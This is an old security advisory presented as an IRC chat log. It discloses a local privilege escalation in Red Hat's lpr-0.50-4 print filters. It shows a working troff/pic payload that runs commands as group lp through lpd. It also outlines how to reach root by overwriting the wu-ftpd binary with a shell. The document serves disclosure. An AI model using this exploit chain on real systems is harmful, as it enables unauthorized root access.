details of an exploit against lpr-0.50-4 (at least)
(also affects other systems that may have the same print filters)
URL : http://crash.ihug.co.nz/~Sneuro/lpd-adv.txt
AFFECTS : lpr-0.50-4 & earlier
SEVERITY : local ROOT possible.
SYNOPSIS : escalation of group permissions, leading to an exploit that
gives access to every user except root. root is sometimes available as
well. (wu-ftpd-2.6.0-14.6x binaries are owned by user bin, and can be
overwritten, allowing root access if wu-ftpd is installed.)
This is a log of an advisory given in channel
#roothat on irc.pulltheplug.com, October 16 2000.
!!!!!!!!!!!!!!!!!!!!!!!! start of log !!!!!!!!!!!!!!!!!!!!!!!
--> zen-parse ([email protected]) has joined #roothat
--- Topic for #roothat is welcome to #roothat -- trivia in #trivia -- root yer
printer and j00 get a new group of friends. and stuff.
--- Topic for #roothat set by zen-parse at Sun Oct 15 01:26:35 2000
--- noid gives channel operator status to zen-parse
<bdev> hey zen
<Safety> zen-parse
<Safety> lockdown
<zen-parse> lo all
<bdev> what's this topic all about then zen?
<zen-parse> new hole in lpr package for redhat
<bdev> and...
<bdev> ;]
<bdev> you releasing it ?
--> possem ([email protected]) has joined #roothat
<zen-parse> [zen@continuity /tmp]$ id
<zen-parse> uid=500(zen) gid=500(zen) groups=500(zen)
<zen-parse> [zen@continuity /tmp]$ cat asdf
<zen-parse> .PS
<zen-parse> sh D/usr/bin/id>/tmp/yougetanyideasyetD
<zen-parse> .PF
<zen-parse> [zen@continuity /tmp]$ lpr asdf
<zen-parse> [zen@continuity /tmp]$ ls /tmp/yougetanyideasyet;cat /tmp/yougetanyideasyet
<zen-parse> uid=500(zen) gid=500(zen) groups=7(lp)
<zen-parse> [zen@continuity /tmp]$
<zen-parse> consider it released
<zen-parse> erm... missing a line...
<bdev> heh
<zen-parse> and should be ls -al /tmp/yougetanyideasyet;cat /tmp/yougetanyideasyet
<zen-parse> -rw-rw-rw- 1 zen zen 39 Oct 16 22:08 /tmp/yougetanyideasyet
<zen-parse> as the output
<bdev> only gid lp ?
<Remmy> ehm
<Remmy> heh
<bdev> but: -r-sr-sr-x 1 root lp 16292 Jan 10 2000 /usr/bin/lpr*
<-- schematic|ZzZz has quit (Ping timeout)
<zen-parse> that's not where the magic happens though.
<zen-parse> ;]
<zen-parse> needs a running lpd
<zen-parse> and a printer that does troff
<zen-parse> eg: PostScript
<zen-parse> cat /usr/lib/rhs/rhs-printfilters/troff-to-ps.fpi
<Remmy> zen...write a bugtraq advisory
<Remmy> but get really really stoned first.
<Remmy> hehe
<zen-parse> `grog -Tps -msafer $TMP_FILE`
<zen-parse> log this... use this as an advisory. ;]
<zen-parse> that is where the magic happens.
<zen-parse> grog is a perl script that selects the correct command line options for groff. groff can, if asked, run a variety of other programs, such as eqn (for equations), tbl (for tables) and pic (for compiling pictures).
<zen-parse> the -msafer means to disallow the call to any dangerous functions, such as executing a command or creating or modifying a file.
<zen-parse> However pic is called without that option being passed, even though it does have a -S switch, which runs it in safer mode.
<possem> zen-parse
<zen-parse> The lpd checks what type of file the file is
<zen-parse> with a program called file
<bdev> hmm
<Remmy> looks perty yummy
<zen-parse> the type of this file is troff or preprocessor...
<-- possem has quit (Quit: )
<zen-parse> so the daemon then hands it to the appropriate filters to print, one of them being /usr/lib/rhs/rhs-printfilters/troff-to-ps.fpi
<zen-parse> which contains the grog command, which causes groff to run pic on the file, and pic executes the file we specify as the user the file was printed by.
<zen-parse> with one exception.
<zen-parse> you have been set to have a list of groups which just contains one group. lp
<Remmy> hmm
<zen-parse> (btw: group lp can edit all the configuration files for lpd. lpd can run the commands as any user (except root).
<zen-parse> however, if u have wuftpd installed, there is a root exploit.
<zen-parse> -rwxr-xr-x 1 bin bin 162608 Oct 14 19:36 /usr/sbin/in.ftpd
<zen-parse> lrwxrwxrwx 1 bin bin 7 Sep 23 02:30 /usr/sbin/wu.ftpd -> in.ftpd
<zen-parse> gain user bin, and copy /bin/sh over in.ftpd
<Remmy> heh
<zen-parse> telnet to port 21, and you have root. so it is a root exploit on systems with wuftpd. and just every other uid on systems with lpd running.
<zen-parse> )
<bdev> heh, nice
<zen-parse> there also appears to be an error file attempting to be made just after privileges are dropped, but it has insufficient rights at that moment to actually succeed. the directory is owned by root, and only has lp write access because the lpd runs as root.
<zen-parse> um. you dats my advisory ;]
--- Users on #roothat: @zen-parse Safety Remmy +bdev eazyass omega|afk lockdown @noid Loki^moo _noah @Loki[f8] lucif3r tWiST3D
<zen-parse> -- Users on #roothat: @zen-parse Safety Remmy +bdev eazyass omega|afk lockdown @noid Loki^moo _noah @Loki[f8] lucif3r tWiST3D
<Remmy> ew
<zen-parse> -- zen-parse ;]
<Remmy> hehe
<Remmy> i lik eyer bigtraq posts better...
<Remmy> ya get all the leeto ascii in there and all...
<zen-parse> ok... now ima save the buffer and submit it to bugtraq ;]
<bdev> kewl
--> ThaReaper ([email protected]) has joined #roothat
<bdev> that'd be a cool advisory
!!!!!!!!!!!!!!!!!!!!!!!!!! end of log !!!!!!!!!!!!!!!!!!!!!!!
Ob-ASCII
/\/\ mee-errraaAAgghhhraher!
= oo = /
\()/ /
/ __ \
|| ||
in memory of
lucky.